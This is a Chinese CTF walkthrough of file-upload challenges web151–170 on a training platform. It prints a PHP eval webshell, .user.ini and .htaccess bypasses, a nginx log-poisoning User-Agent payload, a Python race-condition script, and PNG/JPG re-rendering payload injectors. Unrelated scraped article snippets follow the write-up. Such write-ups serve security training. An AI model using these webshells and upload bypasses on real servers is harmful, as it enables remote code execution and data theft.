每天都要努力哇
每天都要努力哇

web-文件上传【超详细讲解】

目录

    • web151-前端验证
    • web152-前端+MIME
    • web153-`.user.ini`
    • web154·155-文件内容过滤php
    • web156-过滤 php和[]
    • web157-增加过滤`{}` `;`
    • web158-同上关一样
    • web159-过滤括号
    • web160-过滤反引号和空格
    • web161-检测文件头
    • web162~163-文件竞争包含
    • web164-png图片二次渲染
    • web165-jpg二次渲染
    • web166-zip文件上传包含
    • web167-`.htaccess`
    • web169
    • web170

web151-前端验证

前端验证,抓包修改数据OK

web152-前端+MIME

直接抓包修改后缀

web153-.user.ini

自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。

除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。

如果你目录下有user.ini会先去识别里面的配置。当然文档也说了,并不是所有的配置都可以识别。只有 PHP_INI_PERDIRPHP_INI_USER 模式可以。

具体内容看这里

发现auto_append_file和auto_prepend_file
一个相当于在每个php文件尾加上 include(“xxxx”),一个相当于文件头加上 include(“xxx”)
使用条件:

(1)服务器脚本语言为PHP 服务器使用CGI/FastCGI模式

(2)上传目录下要有可执行的php文件

payload
- 上传一张图片马
- 上传 .user.ini 内容为auto_prepend_file=‘图片马名字’
- 访问.user.ini 同级目录中的一个php文件

图片码

cmd跑命令
copy 1.png/b+ 1.txt 2.png

开始实操

图片马写入

<?php @eval($_POST[1]) ?>

然后上传

web-文件上传【超详细讲解】_第1张图片
图片马上传成功

然后上传一张正常图片 burp抓包 改设置

web-文件上传【超详细讲解】_第2张图片

auto_prepend_file=2.png

然后访问一下upload/index.php
web-文件上传【超详细讲解】_第3张图片

传参1=phpinfo();

web-文件上传【超详细讲解】_第4张图片

开始操作就可以了

1=system('ls');

去上一级目录查找

1=system('ls ../');

web-文件上传【超详细讲解】_第5张图片

1=system('cat ../flag.php');

web-文件上传【超详细讲解】_第6张图片
右键查看源代码 即可

web154·155-文件内容过滤php

经过测试

他过滤了php字符串

这里使用了短标签
对于php的标签其他写法,我们这里多说几种

1<? echo '123';?>

前提是开启配置参数short_open_tags=on

2<?=(表达式)?>  等价于 <?php echo (表达式)?>

不需要开启参数设置

3<% echo '123';%>

前提是开启配置参数asp_tags=on,经过测试发现7.0及以上修改完之后也不能使用,而是报500错误,但是7.0以下版本在修改完配置后就可以使用了。

4<script language=”php”>echo '123'; </script>

不需要修改参数开关,但是只能在7.0以下可用。

对于该题,我们可用使用进行绕过

图片内容

web156-过滤 php和[]

payload 
用{
     }代替[]
eval($_POST{
     'a'});

web157-增加过滤{} ;

php 最后的语句也可以不加分号的,前提是得有 ?> 结束标志

payload
<?=system('ls ../')?>
<?=system('cat ../*')?>
访问upload/index.php

web158-同上关一样

web159-过滤括号

payload
反引号代替system()

`cat ../*`?>

web160-过滤反引号和空格

想去包含日志文件

发现log也被过滤了,尝试拼接

先上传图片内容

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

然后上传正常图片 改后缀.user.ini 改内容

auto_prepend_file=5.png

上传成功

web-文件上传【超详细讲解】_第7张图片
然后还需要改UA头 重新抓包 页面

User-Agent: <?php system('tac ../f*');?>

然后访问/upload 右键源代码就可以了

web161-检测文件头

正常图片上传失败 猜测检测了文件头

上传GIF89a 成功绕过

其余和160关是相同的

web162~163-文件竞争包含

看看大佬的博客

还是一样先上传.user.ini 同样检测文件头

然后上传图片 内容就是

GIF89a
<?=include"/tmp/sess_yu22x"?>

然后条件竞争 跑脚本 附上大佬的脚本 通杀

import requests
import threading
session=requests.session()
sess='yu22x'
url1="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/"
url2="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/upload"
data1={
     
	'PHP_SESSION_UPLOAD_PROGRESS':''
}
file={
     
	'file':'yu22x'
}
cookies={
     
	'PHPSESSID': sess
}

def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.get(url2)
		if 'flag' in r.text:
			print(r.text)
			
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

web164-png图片二次渲染

这道题 要制作 ,,制作绕过二次渲染的图片马

具体可以看这里

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
     
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./2.png');  //要修改的图片的路径
/* 木马内容

 */

?>

然后上传png二次渲染的图片

然后查看图片 post抓包 传马

web-文件上传【超详细讲解】_第8张图片
就完事了

web165-jpg二次渲染

web-文件上传【超详细讲解】_第9张图片


    /* The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled(). It is necessary that the size and quality of the initial image are the same as those of the processed image. 1) Upload an arbitrary image via secured files upload script 2) Save the processed image and launch: jpg_payload.php  In case of successful injection you will get a specially crafted image, which should be uploaded again. Since the most straightforward injection method is used, the following problems can occur: 1) After the second processing the injected data may become partially corrupted. 2) The jpg_payload.php script outputs "Something's wrong". If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image. Sergey Bobrov @Black2Fan. See also: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ */

    $miniPayload = "";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
     
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
     
        die('php jpg_payload.php ');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
     
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
     
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
     
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
     
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
     
                    while((!$dis->eof())) {
     
                        if($dis->readByte() === 0xFF) {
     
                            if($dis->readByte !== 0x00) {
     
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
     
                    $outStream = $outStreamTmp;
                } else {
     
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
     
                    die('Success!');
                } else {
     
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
     
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
     
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
     
            if(isset($m[1])) {
     
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
     
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
     
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
     
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
     
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
     
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
     
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
     
            if($this->eof()) {
     
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
     
            if(strlen($this->binData) < 2) {
     
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
     
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
     
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
     
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

格式为:

php <脚本名> <图片名>

web-文件上传【超详细讲解】_第10张图片
上传图片–>查看图片–> 抓包–> 传参

web-文件上传【超详细讲解】_第11张图片
jpg的图片进行二次渲染 经常容易失败 所以多多尝试即可

web166-zip文件上传包含

web-文件上传【超详细讲解】_第12张图片
查看源代码发现只能上传zip

尝试上传zip类型的一句话马

抓到上传成功的url
在这里插入图片描述

抓包–> 传参
返回上一级目录 -->ok

web-文件上传【超详细讲解】_第13张图片

web167-.htaccess

开局喜提小提示

web-文件上传【超详细讲解】_第14张图片

查看源码 发现只允许上传jpg

web-文件上传【超详细讲解】_第15张图片

结合提示 应该就是让用.htaccess进行绕过了

web-文件上传【超详细讲解】_第16张图片
测试成功

上传带马的1.jpg文件 即可

web-文件上传【超详细讲解】_第17张图片

然后拿蚁剑连马 上来
web-文件上传【超详细讲解】_第18张图片

web169

查看源码

web-文件上传【超详细讲解】_第19张图片

那就拿zip后缀进行上传尝试

上传 抓包 修改MIME类型

在这里插入图片描述

Content-Type: image/png

然后 UA头插入一句话木马

然后上传.user.ini 包含日志

auto_prepend_file=/var/log/nginx/access.log

然后上传php文件 内容随意啦

然后靠UA头的一句话木马 连接蚁剑

web-文件上传【超详细讲解】_第20张图片

web170

在这里插入图片描述
上传zip后缀 进行尝试

抓包修改,后缀为php, MIME类型为image/png.

包含.user.ini

auto_prepend_file=/var/log/nginx/access.log

然后上传php文件 内容随意

然后修改UA头为一句话 拿蚁剑连接即可

在上一级目录里找到 flag

web-文件上传【超详细讲解】_第21张图片

你可能感兴趣的:(刷题记)

  • 前端发布 CDN缓存 跳动的世界线 前端缓存CDN
    公司给服务器加了CDN,导致有时前端代码上传打包后,正式环境页面效果却不更新。每次都需要去找运维刷CDN…让我彻底记住了CDN缓存CDN(ContentDeliveryNetwork,内容分发网络)是一种广泛使用的互联网技术,旨在提高用户访问网站的速度和可靠性。CDN的核心思想是将网站的内容缓存到全球分布的边缘节点上,让用户能够从最近的节点获取数据,从而减少延迟和带宽消耗。CDN缓存机制的基本原理
  • 20200126/27 singing阿梅
    初二在家,刷疫情。下午二点多,突然接到上班通知。初三上午,投稿《江南诗》。己亥岁未诗稿三首:天空/冬日来信/冬至,想象一场大雪。邮箱立马通知已满。遂微信联系江离老师(中午得到老师回复)。并写《动物凶猛》一首发东方浩。《动物凶猛》文/应红梅当灾难接踵一个诗人又能做些什么难道只有祈祷、静默接受天谴一截漏风之躯也想代这片多舛的土地呼号、发声与其归咎某一种动物凶猛不如认领残忍是所有元凶隔着一条天河我们大声
  • 手机赚钱软件有哪些 手机上能怎么赚钱呢 氧惠好项目
    手机俨然成为了我们必不可少的工具,可以说如影随形,你可以忘记吃饭忘记休息,但是你肯定不会忘记刷手机。因为只要一部手机在手,就可以满足我们所有的需求。比如:出门叫滴滴、肚子饿了叫个美团饿了么、边嗑瓜子边追剧….等等。手机既然整天不离身,那么我们可以用手机来赚钱码?答案是肯定的,而且小编告诉你,现在已经有很多人在使用手机赚钱了,有些人甚至还将手机赚钱作为职业来搞,那我们今天也就来讲讲,怎么利用一台手机
  • 李诞结婚:爱情就是世界残酷,你还有个温柔乡 北方小确幸
    前几天李诞结婚的消息,刷爆了整个微博的圈子。你看到消息的第一反应是什么,是有趣的灵魂和好看的皮囊终于走进了婚姻的殿堂,还是好嫉妒他女朋友颜值超高,并不嫉妒他结婚了。当李诞说出“人间不值得”这句话的时候,被很多年轻人当做座右铭。当这句话遇到爱情的时候,它就变成了“人间不值得,但是你值得。”曾经他也是一个很普通的人,因为现实的压力,梦想的破碎,让自己筋疲力竭。他的目标是当一个作家,后来他被包装了很多头
  • 游戏趣事 立青日辰
    嘿嘿嘿,今天想写一个游戏里的趣事,那个游戏叫刺激战场。单排进游戏,想着还有个几分钟,就切出来刷了会新闻,再进去的时候,飞机已经飞到头了,把我和其他两个人一起丢了下来自己飞走了,位置在山顶废墟下面靠海的地方,故事就从这里开始啦,我反应过来之后就赶紧朝别的地方飞,顺便做了自身标记,嘿嘿;-),玩过的应该懂哈,等我捡了枪过来之后呢,看见那两个家伙还站在那里,我端起枪就突突,刚打死一个,另外一个居然活了!
  • 15个人生歪理,歪到你不服不行 诗意写清秋
    1、想去买个跑步机,销售建议我一定要买加长豪华版,毕竟以后可以多晾几件衣服袜子。2、有些沉重无人可分担,只能自己左肩换右肩。3、和往事干杯,往事说他是开车来的。4、一定要保持笑容,不然这些年牙齿白刷了。5、一觉醒来,我以为我是长大了,原来是被子横着了。6、老说找不到理想的另一半,难道你成了理想中的自己?7、有时候选择放弃是对的,但是放弃选择是错的。8、如果你不出发,你就永远不会到达。9、老是颓废,
  • 亲子成长迹|第九篇 北草的天空
    改变自己的态度,孩子也会跟着改变。——题记上周是开学的第一周,我们经历了开学后的适应期,不论是大人还是孩子,都没有转变心态,依然松散的松散,忙碌的忙碌,所以当两个人碰撞的时候,便有了争执,有了叛逆,一个想要去管,一个反抗管,所以彼此大干几个回合,分不出输赢,还落得彼此心伤。看了老师发出来的教育视频之后,我猛然惊醒,原来,是我作为母亲没有了解她的心理,只是一味的按照自己的要求来控制她,所以她才会那么
  • Spark MLlib模型训练—推荐算法 ALS(Alternative Least Squares) 不二人生 SparkML实战spark-ml推荐算法算法
    SparkMLlib模型训练—推荐算法ALS(AlternativeLeastSquares)如果你平时爱刷抖音,或者热衷看电影,不知道有没有过这样的体验:这类影视App你用得越久,它就好像会读心术一样,总能给你推荐对胃口的内容。其实这种迎合用户喜好的推荐,离不开机器学习中的推荐算法。在今天这一讲,我们就结合两个有趣的电影推荐场景,为你讲解SparkMLlib支持的协同过滤与频繁项集算法电影推荐场
  • 宫崎骏系列电影:《你想活出怎样的人生》观后感 AR7_ 程序人生
    1回想宫崎骏上一部上映的电影,已经是2013年,距今已有十一年之久,那时在唐山的网吧里,在微博偶然刷到了《起风了》的预告片,一开始就被主题曲《ひこうき雲》轻快动听的旋律吸引住了,加上当时的说法是,这部《起风了》应该是收官之作了,所以当时情绪很复杂,既有期待又有不舍,不像《你想活出怎样的人生》,只是隐约看到一两则新闻,其他没有过多关注,虽然也有说是告别之作,但是竟没觉得有何特别之处,心态还是很坦然的
  • 爱一个人(54) 陌路听雨
    管老三从小就阴,和小朋友打架喜欢用阴招,下手也黑,平时同学们都不搭理他,他就经常把同学的物品给弄坏,或干一些出格的事来刷存在感。管老三越是这样,大家就越讨厌他。有一天他故意把一个女同学的书弄到地上,被这个女同学骂的狗血喷头,管老三不但不生气,还有一种莫名的满足。之后,管老三总是有意无意的惹她,让她大骂自己,管老三后来说,他那时被骂之后会生起一种兴奋与快感,甚至被那位女同学骂贱种、地瓜猩猩,他都会很
  • 亲人之间的爱 123重新看见
    这几天抽时间刷都挺好,演的确实好啊,我对好的概念就是让人看了一眼就不由自主不想换台,不想关手机能继续看下去,让你不停的追剧,没事就在想里面的人物剧情,这是演的非常好了,这部剧就是后者。这几年原生家庭这个词很火,但这么赤裸裸的把重男轻女,自私自利,原生家庭对孩子造成不同的影响,这些不那么正能量的话题以电视剧的形式播出还真是不多见,刚开始苏明玉妈妈去世了,我们看到的是一个冷漠无情的女儿,一滴眼泪没留,
  • 我是新媒体人,我可能要死了 文案帮WEN
    大家好,我是胡啾啾,一个新媒体人我觉得我病了最近一直饱受失眠、爆豆、变丑、长胖的烦恼病入膏肓了我知道这一定是因为我太热爱工作造成的下面给大家说下我这个重度新媒体精神患者发病的日常熬夜病白天犯困哈欠连天喝咖啡晚上精虫上脑睡不着别人睡的时候我醒着别人醒的时候我醒着别人晚上体力活动我晚上脑力活动刷新病上班刷下班刷蹲厕刷睡前刷前三十分钟刷新找热点前1-2小时刷新看数据后2-3小时刷新看数据后3-8小时刷新
  • 2022-02-23 嗨米牛
    莫兰迪色电动牙刷现在的产品真是都会做,全部都做到消费者心里去了,看我最近在嗨米牛上买的电动牙刷,简直太好看了好不好看,真是yyds,一个牙刷带3个刷头,一次充电可以用1个多月有5种模式:亮白模式、清洁模式、敏感模式、按摩模式、抛光模式就冲这颜值,小仙女们给我冲!
  • 圣诞节关我何事? 90后娇娇
    今晚平安夜,明天就是圣诞节了,细想一下,发现这好像跟我没太大关系,不知道大家是不是跟我一样的想法。中午刷微信朋友圈,看到这样一个动态:图片发自App说到底,平安夜和圣诞节本来就是西方的节日,不知道什么时候变成中国人的节日,很多中国人也跟着过平安夜和圣诞节。我印象最深的是,初三那年,很多同学开始买苹果,用包装纸包好,关系好的同学之间相互赠送,代表平安;也有男(女)生用来送给心仪的她(他),表白的礼物
  • 给“五一”做个简单规划,等待假期结束后的复盘 老可是个传说
    每个周末或节假日过得都不尽如人意。单位的工作越来越多,周末和节假日都想特别放纵自己。贪黑,熬夜,刷手机……是一种报复性的休息,但这样只能让自己感觉更累,特别是“五一”这种5天的长假,临近上班的头一天,会对自己很失望。一个假期什么也没做成,休息也没有休息好,反而疲惫、空虚。对即将开始的新一天的工作感到恐惧;对日复一日忙碌的生活感觉无奈。明天“五一”长假就要开始了,我想对这五天的时间进行一次规划,结束
  • 大二上学期详细学习计划 学会沉淀。 学习
    本学习完成目标:项目:书籍:《mysql必知必会》《java核心技术卷》(暂时)加强JavaSE的学习,掌握Java核心Mysql+sql(把牛客上的那50道sql语句题写完)git+maven完成springboot项目(跟着黑马敲)对于每天的Java学习进行记录算法:刷题(多去刷cf上的题,每周15道)针对最近比赛薄弱的地方加强练习(图论,字符串,动态规划,搜索)cf先上1400,牛客和atc
  • 今天战斗打响了 淄仪
    今天开始我的刷酸第一天先把内容记下来,免得忘了1.晚‌上洗‌面奶洗‌脸‌后,取适‌量的面‌膜薄‌薄‌涂‌抹于皮‌肤(长‌痘‌痘、粉‌刺多、痘印、黑‌头、毛‌孔‌油‌脂分泌较多的地‌方)上,轻‌轻按‌摩1-2分‌钟‌后,首‌次停‌留5-1‌5分‌钟‌后洗去2.连‌续5天‌外‌用‌水‌杨‌酸‌面‌膜5-1‌5分‌钟‌均没‌有‌出‌现不‌良‌反‌应,从第6天‌起适‌时‌面‌膜在面‌部的停留‌时‌间3.面
  • 有再多笔刷,也成不了大神 成子曰
    成子的第64篇原创关注平行世界多样生活,我们一起成长笔刷是PS里面的一种工具,就跟咱们用的笔一样有很多种类。总是会看到很多人喜欢在大神们微博底下留言问他们的笔刷用的是什么,有点舍本逐末,画的好的重点不是笔刷是日复一日的学习练习创作。前段时间在B站有的作者在介绍自己写文发文的经验,我看见有人在评论里问作者用什么软件写的字。我都惊呆了这都问,什么不能写。我们总是以为有了工具自己就跟大神一样了,买最贵的
  • 19佳玉:如果你拒绝了我,我们还是可以做朋友 佳玉L
    上午考了科一,很累。吃了饭本来想休息,睡不着,总觉得自己应该做点什么。刷朋友圈看到小静鱼晒了和依依的照片,脑海里快速闪过一个念头:“我要和桂枝面基。”没有多想,马上在微信上跟桂枝联系了,确定了面基的时间。当我们能量低的时候,一定不要就此沉沦下去,找一个能量比自己高的人,多交流多学习。不要担心场面会尴尬,就算尬聊也是一种经历。去年我还不好意思和朋友谈钱,其实今年也好不了哪去,做的都是很佛性的生意,生
  • 周勇//2.8日立春五日//古风· 《三体》人物形象分析之汪淼//立春·春景·春意(五) 高山流水无情剑
    题记:特殊战线,展露峥嵘,重任在肩,风险敢迎。科学院士,科研纳米,揭秘三体,伴随险情。巧将敌况,频频传送,暗助国安,屡屡功成。小说誉称,工具神人。一人能抵,几师雄兵。古风·《三体》人物形象分析之汪淼君不见,汪淼三体第一季,三重身份立天地。君不闻,串联故事一重身,推动情节因他续。二重身,气质佳,院士尊号名迩遐。三重身,责任大,协助国安做调查。扫除科学边界邪,保护高端科学家。慷慨赴难卧底去,重任在肩气
  • 2018.02.21. 璞玉的长亭
    今天似乎做错了一件事,得罪了一个人。一直很难过我讨厌很多东西我想遵从自己的内心好恶现在在网上刷你的信息,易烊千玺,你考中戏哇(~O~)今天就写到这样吧,这是我第一次在写东西,今年是2018,你正好17岁,真好!ps:你学那么多东西,你开心吗?累吗?图片发自App
  • 成年人的世界,谈何容易?? 予浅云
    年后真的很忙,加上焦虑不安的心情。所以,感觉每天都没有太好的心情去坚持日更。没有很好的内容可以输出。然后会不断陷入死循环的怪圈。想停下来调整调整,结果一停下来就会更加的焦虑,然后又重新在状态没调整好就强行去假装努力……最后的结果当然是什么都做不好!以前没有短视频的时候,大家估计都会静下来去看看各种文章,通过文字加深对世界的认识。自从有了短视频,大家更倾向于短暂的快乐,通过不停的刷视频获取短暂的快乐
  • 铄霸410 菜芯鸡蛋羹
    铄铄:关于你踩了别人的鞋这件事情,你是怎么认为的?对方是怎么认为的?这件事情你认为是大,就是大,认为小,就是小。如果你认为踩了别人鞋子一下,就特别对不起别人,需要被别人打被别人骂才能够补偿,那么这就是你的信念。信念是什么东西呢?信念就是你认为事情应该是怎么样的。如果你认为踩别人鞋子这件事儿是特别小的事儿,你只需要道个歉。或者大家就是同学,踩一下又能怎么着,你回家刷一下不就行了么。对方可以保证他在你
  • C# 图形图像技术(通过Graphics绘制图像) 萨达大 c#开发语言
    文章目录创建Graphics对象画笔与画刷画笔画刷SolidBrush类HatchBrush类LinerGradientBrush类基本图形绘制矩形椭圆圆弧扇形创建Graphics对象privatevoidForm1_Load(objectsender,Eventargse){Graphicsghs=this.CreateGraphics();}画笔与画刷画笔构造函数publicPen(Color
  • 2018-01-28 小确幸里的小幸福
    接连看到“远嫁的姑娘,最怕过年”的标题图片发自App还有身边朋友关于是“去娘家过年还是去婆家过年的商量”更有甚者“去你家,那我爸妈怎么办?的争执”图片发自App再到今天刷爆朋友圈的一条帖子:会挣钱时在婆家,小时候需要照顾时在娘家,会照顾别人时在婆家,一辈子亏欠了娘家,却不一定感动婆家!!今天被这句话刷屏了!感恩父母!这辈子只欠父母,不欠谁。[爱心]图片发自App小编只想说,时光啊!能再慢点吗?最近
  • 卷到怀疑人生!一屋子人都在做Java笔试 小坏讲微服务 java面试求职招聘springboot
    卷到怀疑人生!一屋子人都在做Java笔试、请大家推荐下转发下我的视频帮助更多的人避坑说明一下这家公司超级坑货、早上10点-晚上8点面试,几个小时笔试二三十个人、在一间没有空调的房间里、热死了二三十个人在一起写、完全像是被喊过来浪费时间啊、还是周日愉快的时光被这个智障公司给浪费了希望大家都不要被这家骗过去刷KPI、希望大家看见直接拉黑啊、卷到怀疑人生!一屋子人都在做Java笔试
  • 你是太阳的后裔,也拯救不了你婚姻的危机 小妖辛
    6月27日,韩媒爆料,宋仲基已于26日向宋慧乔提出离婚申请,昔日如童话爱情中那般甜蜜的两人终究还是没能延续剧中的爱情,走到了离婚这个地步。消息一经传出,迅速刷爆网络,网友感慨“双宋也能离婚?真的再也不相信爱情了!”“那些年磕过的cp原来都是假的!”“王子公主的童话不应该是幸福快乐地生活在一起了吗?为什么会变成这样?”图片发自App2016年,双宋cp因为《太阳的后裔》而被大众所熟知,《太阳的后裔》
  • 除了人民币 其他的东西多了并不好 会赚会存会花钱的美少女
    今晚凌晨3点05了,我正在目不转睛的看着手机屏幕不想睡觉觉。一点儿都不困,老精神了,这期间光逛淘宝了,我现在要立马马上放下手机,立地成佛。滚去卸妆,洗脸,刷鞋,明早早起洛北花园见呦。加油加油加油!
  • ·淘宝店铺怎么推广引流,淘宝商品怎么推广? 好项目高省
    任何事都有一个规律,都有一个关键点,阿基米德说:“给我一个立足点和一根足够长的杠杆,我就可以撬动地球”可能这话说得比较有争议,但也不是毫无道理的。就好比我们做电商,如果你找到了关键点,运营方法用对了,往往可以事半功倍,而我们大多数人,正好相反,只懂一个使劲刷,使劲烧,在一开始就把杠杆点给搞错了,总是得不到预期的效果,那么淘宝推广的重要方法有哪些呢?小编整理的五个方法,下面分享给大家!大家好,我是高
  • P131-案例收录学习02 Veronique228薇子
    案例一手机不离手,洗澡都看视频家长:孩子学习是自己安排的,家长从来不操心,担心的是他为什么整天手机不离手,连洗澡都在看视频,这个是天性如此吗?小时候永远在看书,现在永远在看手机,想请老师解读这种行为。老师:从另外一个角度我看到的是孩子从过去的看书的一个思维转变到现在在手机上学习,看书在学习,难道看手机不是在学习吗?很多的视频里面转变思维的能力,有时候看孩子们刷视频,我觉得有那么好玩吗?一个个都笑的
  • 项目中 枚举与注解的结合使用 飞翔的马甲 javaenumannotation
    前言:版本兼容,一直是迭代开发头疼的事,最近新版本加上了支持新题型,如果新创建一份问卷包含了新题型,那旧版本客户端就不支持,如果新创建的问卷不包含新题型,那么新旧客户端都支持。这里面我们通过给问卷类型枚举增加自定义注解的方式完成。顺便巩固下枚举与注解。 一、枚举 1.在创建枚举类的时候,该类已继承java.lang.Enum类,所以自定义枚举类无法继承别的类,但可以实现接口。
  • 【Scala十七】Scala核心十一:下划线_的用法 bit1129 scala
    下划线_在Scala中广泛应用,_的基本含义是作为占位符使用。_在使用时是出问题非常多的地方,本文将不断完善_的使用场景以及所表达的含义   1. 在高阶函数中使用 scala> val list = List(-3,8,7,9) list: List[Int] = List(-3, 8, 7, 9) scala> list.filter(_ > 7) r
  • web缓存基础:术语、http报头和缓存策略 dalan_123 Web
    对于很多人来说,去访问某一个站点,若是该站点能够提供智能化的内容缓存来提高用户体验,那么最终该站点的访问者将络绎不绝。缓存或者对之前的请求临时存储,是http协议实现中最核心的内容分发策略之一。分发路径中的组件均可以缓存内容来加速后续的请求,这是受控于对该内容所声明的缓存策略。接下来将讨web内容缓存策略的基本概念,具体包括如如何选择缓存策略以保证互联网范围内的缓存能够正确处理的您的内容,并谈论下
  • crontab 问题 周凡杨 linuxcrontabunix
      一: 0481-079   Reached   a   symbol   that   is   not   expected.   背景: */5   *   *   *   *  /usr/IBMIHS/rsync.sh 
  • 让tomcat支持2级域名共享session g21121 session
    tomcat默认情况下是不支持2级域名共享session的,所有有些情况下登陆后从主域名跳转到子域名会发生链接session不相同的情况,但是只需修改几处配置就可以了。 打开tomcat下conf下context.xml文件 找到Context标签,修改为如下内容 如果你的域名是www.test.com <Context sessionCookiePath="/path&q
  • web报表工具FineReport常用函数的用法总结(数学和三角函数) 老A不折腾 Webfinereport总结
      ABS ABS(number):返回指定数字的绝对值。绝对值是指没有正负符号的数值。 Number:需要求出绝对值的任意实数。 示例: ABS(-1.5)等于1.5。 ABS(0)等于0。 ABS(2.5)等于2.5。   ACOS ACOS(number):返回指定数值的反余弦值。反余弦值为一个角度,返回角度以弧度形式表示。 Number:需要返回角
  • linux 启动java进程 sh文件 墙头上一根草 linuxshelljar
    #!/bin/bash #初始化服务器的进程PId变量 user_pid=0; robot_pid=0; loadlort_pid=0; gateway_pid=0; ######### #检查相关服务器是否启动成功 #说明: #使用JDK自带的JPS命令及grep命令组合,准确查找pid #jps 加 l 参数,表示显示java的完整包路径 #使用awk,分割出pid
  • 我的spring学习笔记5-如何使用ApplicationContext替换BeanFactory aijuans Spring 3 系列
    如何使用ApplicationContext替换BeanFactory? package onlyfun.caterpillar.device; import org.springframework.beans.factory.BeanFactory; import org.springframework.beans.factory.xml.XmlBeanFactory; import
  • Linux 内存使用方法详细解析 annan211 linux内存Linux内存解析
    来源 http://blog.jobbole.com/45748/ 我是一名程序员,那么我在这里以一个程序员的角度来讲解Linux内存的使用。 一提到内存管理,我们头脑中闪出的两个概念,就是虚拟内存,与物理内存。这两个概念主要来自于linux内核的支持。 Linux在内存管理上份为两级,一级是线性区,类似于00c73000-00c88000,对应于虚拟内存,它实际上不占用
  • 数据库的单表查询常用命令及使用方法(-) 百合不是茶 oracle函数单表查询
        创建数据库;       --建表 create table bloguser(username varchar2(20),userage number(10),usersex char(2));       创建bloguser表,里面有三个字段     &nbs
  • 多线程基础知识 bijian1013 java多线程threadjava多线程
